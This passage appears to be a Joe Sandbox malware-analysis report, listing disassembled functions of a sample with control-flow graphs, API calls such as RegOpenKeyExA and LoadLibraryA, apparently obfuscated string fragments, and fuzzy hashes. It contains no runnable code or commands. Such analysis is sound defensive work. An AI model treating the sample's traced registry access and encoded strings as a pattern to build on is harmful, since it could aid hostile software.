                                                                                                                                                                                    control_flow_graph 17678 7db80-7dbbb 17679 7dbc2-7dbe7 17678->17679 17680 7eea6-7eeb3 call 70360 17679->17680 17681 7dbed-7dc2c 17679->17681 17685 7eeb8-7eece 17680->17685 17682 7dc30-7dc3e 17681->17682 17682->17682 17684 7dc40-7dc6c 17682->17684 17686 7dc70-7dc75 17684->17686 17687 7eed0-7eedb 17685->17687 17686->17686 17688 7dc77-7dcac call 32830 17686->17688 17687->17687 17689 7eedd-7ef0c call 99ec0 call 93910 17687->17689 17694 7dcb0-7dcbe 17688->17694 17699 7ef10-7ef1b 17689->17699 17694->17694 17696 7dcc0-7dcef 17694->17696 17698 7dcf0-7dcf5 17696->17698 17698->17698 17700 7dcf7-7dd6a call 32830 call 95e10 * 2 call 50b90 17698->17700 17699->17699 17701 7ef1d-7ef93 call 99ec0 call 938b0 * 2 17699->17701 17716 7dd70-7dd7b 17700->17716 17716->17716 17717 7dd7d-7de36 call 99ec0 call 93910 call 93510 call 938b0 * 2 17716->17717 17728 7de40-7de4e 17717->17728 17728->17728 17729 7de50-7de7c 17728->17729 17730 7de80-7de85 17729->17730 17730->17730 17731 7de87-7deb6 call 32830 17730->17731 17734 7dec0-7dece 17731->17734 17734->17734 17735 7ded0-7defc 17734->17735 17736 7df00-7df05 17735->17736 17736->17736 17737 7df07-7df7a call 32830 call 95e10 * 2 call 50b90 17736->17737 17746 7df80-7df8b 17737->17746 17746->17746 17747 7df8d-7e038 call 99ec0 call 93910 call 93510 call 938b0 * 2 17746->17747 17758 7e040-7e04e 17747->17758 17758->17758 17759 7e050-7e079 17758->17759 17760 7e080-7e085 17759->17760 17760->17760 17761 7e087-7e0ed call 32830 call 95e10 call 533d0 17760->17761 17768 7e0f0-7e0fe 17761->17768 17768->17768 17769 7e100-7e1ac call 99ec0 call 93910 call 93510 call 938b0 * 2 17768->17769 17780 7e1b0-7e1bb 17769->17780 17780->17780 17781 7e1bd-7e1dc 17780->17781 17782 7e1e3-7e1e8 17781->17782 17782->17782 17783 7e1ea-7e247 call 32830 call 95e10 call 54730 17782->17783 17790 7e250-7e25e 17783->17790 17790->17790 17791 7e260-7e31f call 99ec0 call 93910 call 93510 call 938b0 * 2 17790->17791 17802 7e320-7e32e 17791->17802 17802->17802 17803 7e330-7e35c 17802->17803 17804 7e360-7e365 17803->17804 17804->17804 17805 7e367-7e39b call 32830 17804->17805 17808 7e3a0-7e3ae 17805->17808 17808->17808 17809 7e3b0-7e3dc 17808->17809 17810 7e3e0-7e3e5 17809->17810 17810->17810 17811 7e3e7-7e43d call 32830 call 95e10 call 55a90 17810->17811 17818 7e441-7e44c 17811->17818 17818->17818 17819 7e44e-7e507 call 99ec0 call 93910 call 93510 call 938b0 * 2 17818->17819 17830 7e510-7e51e 17819->17830 17830->17830 17831 7e520-7e54c 17830->17831 17832 7e550-7e555 17831->17832 17832->17832 17833 7e557-7e57c call 32830 17832->17833 17836 7e580-7e58b 17833->17836 17836->17836 17837 7e58d-7e5ac 17836->17837 17838 7e5b3-7e5b8 17837->17838 17838->17838 17839 7e5ba-7e61d call 32830 call 95e10 call 58570 17838->17839 17846 7e620-7e62e 17839->17846 17846->17846 17847 7e630-7e6ef call 99ec0 call 93910 call 93510 call 938b0 * 2 17846->17847 17858 7e6f0-7e6fe 17847->17858 17858->17858 17859 7e700-7e72c 17858->17859 17860 7e730-7e735 17859->17860 17860->17860 17861 7e737-7e75c call 32830 17860->17861 17864 7e760-7e76b 17861->17864 17864->17864 17865 7e76d-7e78c 17864->17865 17866 7e793-7e798 17865->17866 17866->17866 17867 7e79a-7e7fd call 32830 call 95e10 call 58570 17866->17867 17874 7e800-7e80e 17867->17874 17874->17874 17875 7e810-7e8bc call 99ec0 call 93910 call 93510 call 938b0 * 2 17874->17875 17886 7e8c0-7e8cb 17875->17886 17886->17886 17887 7e8cd-7e8ec 17886->17887 17888 7e8f3-7e8f8 17887->17888 17888->17888 17889 7e8fa-7e95b call 32830 call 95e10 call 5a760 17888->17889 17896 7e960-7e96e 17889->17896 17896->17896 17897 7e970-7ea2f call 99ec0 call 93910 call 93510 call 938b0 * 2 17896->17897 17908 7ea30-7ea3e 17897->17908 17908->17908 17909 7ea40-7ea6c 17908->17909 17910 7ea70-7ea75 17909->17910 17910->17910 17911 7ea77-7ea9c call 32830 17910->17911 17914 7eaa2-7eaad 17911->17914 17914->17914 17915 7eaaf-7eace 17914->17915 17916 7ead5-7eada 17915->17916 17916->17916 17917 7eadc-7eb32 call 32830 call 95e10 call 5ba60 17916->17917 17924 7eb36-7eb41 17917->17924 17924->17924 17925 7eb43-7ebce call 99ec0 call 93910 call 93510 call 938b0 * 2 17924->17925 17936 7ebd4-7ebff 17925->17936 17937 7ed7c-7ed83 17925->17937 17938 7ec02-7ec10 17936->17938 17937->17679 17938->17938 17939 7ec12-7ec3e 17938->17939 17940 7ec40-7ec45 17939->17940 17940->17940 17941 7ec47-7ec80 call 32830 call 95e10 call 61010 17940->17941 17947 7ec85-7ec8e 17941->17947 17948 7ec90-7ecb1 17947->17948 17949 7ecb7-7ed33 call 95e10 * 4 17948->17949 17950 7ed71-7ed77 call 92640 17948->17950 17960 7ed56-7ed6c call a1220 call 7f0b0 17949->17960 17961 7ed35-7ed51 call a96f0 call 7f0b0 17949->17961 17950->17937 17960->17948 17961->17948
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: BI^$BI^$BI^$BI^$DGFA$DGFA$DI[N$F]]E$KGNC$KGNC$MEAB$NB^$OAZ^$T[VO$dGFA$dGFA$h]]F$kGJK$kGJK$kGJK$kGJK$kGJK$kGJK$kGNC$kGNC$oAZ^$oAZ^$oMYO$oMYO$oMYO$pMK$pMK$pMK
                                                                                                                                                                                    • API String ID: 0-1035761944
                                                                                                                                                                                    • Opcode ID: 2e67f5fe62409dc573456b2142c68ffda388977054eb05ccac4d285e9bc6ad3e
                                                                                                                                                                                    • Instruction ID: b39ed098f56cb9bdbe68e435b46d6f233cdf8906699557f55fc555612d00ba2b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e67f5fe62409dc573456b2142c68ffda388977054eb05ccac4d285e9bc6ad3e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2AC2DD70D082998BDB19DF64C8557DEBBB1AF1A308F1481DCD4896B243EB709B89CF91
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0006A700 Relevance: 40.0, APIs: 2, Strings: 20, Instructions: 1484libraryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0006B5CA
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(465C4951,?), ref: 0006BA46
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LibraryLoadUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                    • String ID: /,ms$HI^$MEAK$OAZ^$OAZ^$SADO$\A][$_kHZ$_kHZ$cannot use operator[] with a string argument with $fDT_$fDT_$g`)#$qI\F$qI\F$qI\F$wI]B$wZFL${XEK${X[E
                                                                                                                                                                                    • API String ID: 2188052229-683922061
                                                                                                                                                                                    • Opcode ID: 1c0439bf132ddb24b7d0f24b6b41b7f95b327b768a05da39b8757c2032ab94d9
                                                                                                                                                                                    • Instruction ID: b6c639e2513740ce5ebd26942ba21c08bd9ab64f5df250d83e744cbe15490c68
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c0439bf132ddb24b7d0f24b6b41b7f95b327b768a05da39b8757c2032ab94d9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3DD2F2709042588FEB25CF64CC45BEEBBB6AF15304F14419DE449AB292EB709BC5CF91
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 00070360 Relevance: 36.0, APIs: 1, Strings: 19, Instructions: 954registryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 18932 70360-7041d call 93c80 call 93c50 call 40550 call 99ec0 call 938d0 18943 70423-7045a call 95e10 call 327a0 RegOpenKeyExA 18932->18943 18948 711b4-711d8 call 32660 18943->18948 18949 70460-70498 call 10f090 18943->18949 18948->18943 18954 711de-711f6 18948->18954 18956 7049e 18949->18956 18957 711ab-711b3 18949->18957 18958 704a0-704bd 18956->18958 18957->18948 18961 704c3-70582 call 10f090 * 5 18958->18961 18962 7116d-711a5 call 10f090 18958->18962 18976 70586-70591 18961->18976 18962->18957 18962->18958 18976->18976 18977 70593-705b9 18976->18977 18979 71164-7116c 18977->18979 18980 705bf-7061c 18977->18980 18979->18962 18981 70622-70627 18980->18981 18981->18981 18983 70629-7069a call 32830 call 10f090 * 2 18981->18983 18990 706a0-706ab 18983->18990 18990->18990 18991 706ad-706d3 18990->18991 18993 70726-7072d 18991->18993 18994 706d5-70724 call 3da00 18991->18994 18996 7072f-70735 18993->18996 18997 7074b-70752 18993->18997 18994->18993 19001 7077d-7079e 18994->19001 18999 70738-7073d 18996->18999 19000 70754-7075d 18997->19000 18997->19001 18999->18999 19003 7073f-70741 18999->19003 19004 70760-70765 19000->19004 19002 707a0-707ab 19001->19002 19002->19002 19005 707ad-707d0 19002->19005 19003->18997 19007 70743-70749 19003->19007 19004->19004 19008 70767-70769 19004->19008 19013 707d6-7082b call 3a710 19005->19013 19014 708e3-708ea 19005->19014 19009 70771-70778 call 95c30 19007->19009 19008->19001 19010 7076b 19008->19010 19009->19001 19010->19009 19013->19014 19036 70831-70886 call 3a710 19013->19036 19015 7092d-70934 19014->19015 19016 708ec-708f2 19014->19016 19020 70936-7093f 19015->19020 19021 70978-7097f 19015->19021 19018 708f5-708fa 19016->19018 19018->19018 19022 708fc-708fe 19018->19022 19025 70940-70945 19020->19025 19023 70981-7098a 19021->19023 19024 709cb-709d2 19021->19024 19022->19015 19029 70900-70928 call 3b880 call 95c30 19022->19029 19030 70990-70995 19023->19030 19026 709d4-709dd 19024->19026 19027 70a2a-70a8c call 95940 * 2 call 95960 call 9a8f0 call 95980 19024->19027 19025->19025 19028 70947-70949 19025->19028 19032 709e0-709e5 19026->19032 19074 70a91-70b1f call 97810 call 10ce31 call 95e10 19027->19074 19028->19021 19033 7094b-70973 call 3b880 call 95c30 19028->19033 19058 70a1c-70a27 call 4ffc0 19029->19058 19030->19030 19035 70997-70999 19030->19035 19032->19032 19038 709e7-709e9 19032->19038 19033->19058 19035->19024 19041 7099b-709c9 call 3b880 call 95c30 19035->19041 19036->19014 19065 70888-708dd call 3a710 19036->19065 19038->19027 19044 709eb-70a16 call 3b880 call 95c30 19038->19044 19041->19058 19044->19058 19058->19027 19065->19014 19065->19074 19081 70b23-70b2e 19074->19081 19081->19081 19082 70b30-70b3c 19081->19082 19083 70b3e-70b6a call 97810 19082->19083 19084 70b6c-70b6e 19082->19084 19089 70b7a-70b9e 19083->19089 19085 711f7-7124a call 97ae0 call 32700 call 99c70 call 38920 call 10ea9b 19084->19085 19086 70b74 19084->19086 19111 7124f-71254 call 112350 19085->19111 19086->19089 19092 70ba1-70ba6 19089->19092 19092->19092 19094 70ba8-70bdb call 32830 call 9cfd0 19092->19094 19104 70bdd-70bec 19094->19104 19105 70c0c-70cce call 938b0 call 10ce31 call 95e10 19094->19105 19108 70c02-70c09 call 10d0b2 19104->19108 19109 70bee-70bfc 19104->19109 19120 70cd0-70cdb 19105->19120 19108->19105 19109->19108 19109->19111 19120->19120 19121 70cdd-70d02 19120->19121 19122 70d05-70d0a 19121->19122 19122->19122 19123 70d0c-70d40 call 32830 call 9cfd0 19122->19123 19128 70d42-70d51 19123->19128 19129 70d71-70e0e call 938b0 call 10ce31 19123->19129 19131 70d67-70d6e call 10d0b2 19128->19131 19132 70d53-70d61 19128->19132 19138 70e15-70e1a 19129->19138 19131->19129 19132->19111 19132->19131 19138->19138 19139 70e1c-70e50 call 32830 19138->19139 19142 70e54-70e5f 19139->19142 19142->19142 19143 70e61-70e89 19142->19143 19144 70e90-70e95 19143->19144 19144->19144 19145 70e97-70ecb call 32830 call 9cfd0 19144->19145 19150 70ecd-70edc 19145->19150 19151 70efc-70fc1 call 938b0 call 10ce31 call 95e10 19145->19151 19152 70ef2-70ef9 call 10d0b2 19150->19152 19153 70ede-70eec 19150->19153 19162 70fc7-70fd2 19151->19162 19152->19151 19153->19111 19153->19152 19162->19162 19163 70fd4-70ffc 19162->19163 19164 71000-71005 19163->19164 19164->19164 19165 71007-7103b call 32830 call 9cfd0 19164->19165 19170 7103d-7104c 19165->19170 19171 7106c-710cf call 938b0 19165->19171 19172 71062-71069 call 10d0b2 19170->19172 19173 7104e-7105c 19170->19173 19177 710d0-710db 19171->19177 19172->19171 19173->19111 19173->19172 19177->19177 19179 710dd-71112 call 99ec0 call 93230 call 938b0 19177->19179 19186 71127-7115e call 32660 * 2 19179->19186 19187 71114-71122 call 327b0 19179->19187 19186->18979 19187->19186
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,001661C0,00000000), ref: 00070452
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Open
                                                                                                                                                                                    • String ID: KGNC$KGNC$WIZY$WZFL$\C_J$\G^@$\G^@$\G^@$\G^@$bEHC$cannot use operator[] with a string argument with $nehz$nehz$nehz$o|}z$o|}z$te}z$te}z$te}z
                                                                                                                                                                                    • API String ID: 71445658-906255000
                                                                                                                                                                                    • Opcode ID: 55a03424c190c6796f4bb4b9a544f1b8bb2b8f0ecd2326c4e8538041fa8f4ec8
                                                                                                                                                                                    • Instruction ID: acf8ee7e3dcef1d54ce89460da2890219dad28f1313352960824c7a061098f03
                                                                                                                                                                                    • Opcode Fuzzy Hash: 55a03424c190c6796f4bb4b9a544f1b8bb2b8f0ecd2326c4e8538041fa8f4ec8
                                                                                                                                                                                    • Instruction Fuzzy Hash: FD929D70C04258DEEF25CB64CC44BEDBBB8AF15304F1482D9E449A7282EB756B89CF65
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0006D5A0 Relevance: 33.1, APIs: 7, Strings: 11, Instructions: 1648COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?), ref: 0006D730
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0006D760
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0006E2C6
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0006E2D6
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0006EC6D
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0006D84C
                                                                                                                                                                                      • Part of subcall function 0009D850: Concurrency::cancel_current_task.LIBCPMT ref: 0009D92D
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0006EC24
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Mtx_unlock$AttributesConcurrency::cancel_current_taskFile
                                                                                                                                                                                    • String ID: X_CV$YMJK$\C_J$fKJE$invalid stoi argument$jONA$stoi argument out of range$wIZY${EHZ${M^]${{]E
                                                                                                                                                                                    • API String ID: 3826552558-358244274
                                                                                                                                                                                    • Opcode ID: 5823baf99926bef29630bcba2a6d7338be62483d1d146812d01fdb8d71279d3f
                                                                                                                                                                                    • Instruction ID: cc66b7c6e6764f7b84a7b5a23d28283e17cd20d5ad423194c837265c31f965aa
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5823baf99926bef29630bcba2a6d7338be62483d1d146812d01fdb8d71279d3f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 65E2D570D002988FEF19CF68CC98BEDBBB6AF55304F148299D04967292DB749AC5CF61
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0005BA60 Relevance: 28.7, Strings: 21, Instructions: 2456COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Initstd::locale::_
                                                                                                                                                                                    • String ID: @\FA$BFJX$BFJX$BFJX$D^Fr$H[vI$H[vI$H[vI$KoZW$KoZW$NB^$R\YK$R\YK$R\YK$SGBO$TM[\$YU]Z$YU]Z$YU]Z$cannot use operator[] with a string argument with $iM]]
                                                                                                                                                                                    • API String ID: 1620887387-3241639465
                                                                                                                                                                                    • Opcode ID: 77132a45e13487fe259cd8854d1502723a8352774f4c8c86545a57583a7abbe1
                                                                                                                                                                                    • Instruction ID: 8db635abf267baf75149623425008e876ddcc85db4fe8ef319d3f2512fa83467
                                                                                                                                                                                    • Opcode Fuzzy Hash: 77132a45e13487fe259cd8854d1502723a8352774f4c8c86545a57583a7abbe1
                                                                                                                                                                                    • Instruction Fuzzy Hash: B823E170D002588FDF29CF68CC48BEEBBB5AF55304F1482D9E84967292DB745B89CB91
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 00083910 Relevance: 26.5, Strings: 20, Instructions: 1493COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Mtx_unlock$AttributesConcurrency::cancel_current_taskCreateDirectoryFile
                                                                                                                                                                                    • String ID: /$5J$@WK^$FJ$K@$KGNCE$KGNCE$PJ$WIZY\C_J$WIZY\C_J$WZFL$WZFL$X[B\$]R$wZFLB@H]${${${NFR${XHY${j[E\_H\\
                                                                                                                                                                                    • API String ID: 1266625421-2645360642
                                                                                                                                                                                    • Opcode ID: 8bae0f0cccfa1a434dbf2cb3fd62de4cfbfe34235a3b99c1e5c4c48639aca37d
                                                                                                                                                                                    • Instruction ID: f36f1701f256acbe60cf817cd0e8a6f973cc086d32bb7bad23b1e188c31d761f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8bae0f0cccfa1a434dbf2cb3fd62de4cfbfe34235a3b99c1e5c4c48639aca37d
